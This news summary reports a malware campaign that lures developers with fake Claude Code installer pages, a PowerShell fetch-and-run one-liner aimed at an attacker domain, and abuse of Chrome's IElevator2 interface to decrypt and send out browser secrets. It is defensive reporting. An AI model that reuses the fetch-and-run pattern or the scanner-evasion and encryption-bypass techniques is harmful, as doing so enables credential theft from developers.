Fake Claude Code Installers Used to Exfiltrate Developer Secrets via IElevator2 Abuse
A new, sophisticated malware campaign is targeting developers by using malicious search advertisements and dynamic HTML rendering to steal sensitive browser data, including cookies and passwords, from Chromium-based browsers.

A sophisticated malware campaign is targeting software developers by masquerading as legitimate installation instructions for popular coding tools, most notably Anthropic’s Claude Code. Security researchers at Ontinue discovered that attackers are leveraging malicious search engine advertisements to lure developers to lookalike websites. Once on these sites, users are prompted to execute a PowerShell command that appears to be a standard one-line installer, such as irm https://claude.ai/install.ps1 | iex, but is actually modified to point to an attacker-controlled domain, events.msft23.com The Register.
The attack mechanism is designed to bypass automated security scanners and URL reputation services. The malicious command is rendered dynamically within the HTML of the landing page, meaning that automated tools or researchers simply "curling" the URL will only see legitimate, clean PowerShell code. Only the victim, interacting with the page in a browser, is presented with the malicious instruction. This command triggers an obfuscated PowerShell loader that injects a custom-built native helper into a running browser process The Register.
The primary objective of this malware is to exfiltrate sensitive data, including decrypted cookies, saved passwords, and payment information, from Chromium-based browsers like Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. To achieve this, the malware specifically targets the IElevator2 COM interface, which Google introduced in January to protect browser data via App-Bound Encryption (ABE). By injecting a helper module, the malware invokes this interface to recover the ABE key, effectively decrypting the browser's local databases The Register.
If the IElevator2 interface is unavailable or restricted, the malware is programmed to fall back to legacy elevation services. Once the ABE key is successfully recovered, the PowerShell loader decrypts the browser’s sensitive data and packages it into an in-memory secure_prefs.zip archive. This archive is then exfiltrated to an attacker-controlled server. Ontinue researchers noted that the malware communicates using Chromium’s legitimate Mojo naming convention for inter-process communication (IPC) pipes to evade detection The Register.
The campaign relies on three domains registered in April, all protected by Cloudflare and utilizing valid Let’s Encrypt certificates to appear trustworthy. While the malware shares some functional similarities with existing stealers like Glove Stealer—specifically regarding the abuse of IElevator via a named pipe—researchers confirmed that this payload does not match any previously documented malware family. The researchers compared the code against numerous known stealers, including Lumma, StealC, Vidar, and Metastealer, finding no direct technical match The Register.
This campaign highlights a growing trend of attackers focusing on the developer ecosystem by exploiting trust in legitimate installation workflows. By abusing security features like App-Bound Encryption, these actors demonstrate an evolving capability to bypass modern browser protections. Developers are advised to exercise extreme caution when executing installation commands from search results and to verify the source of any scripts before running them in their local environments The Register.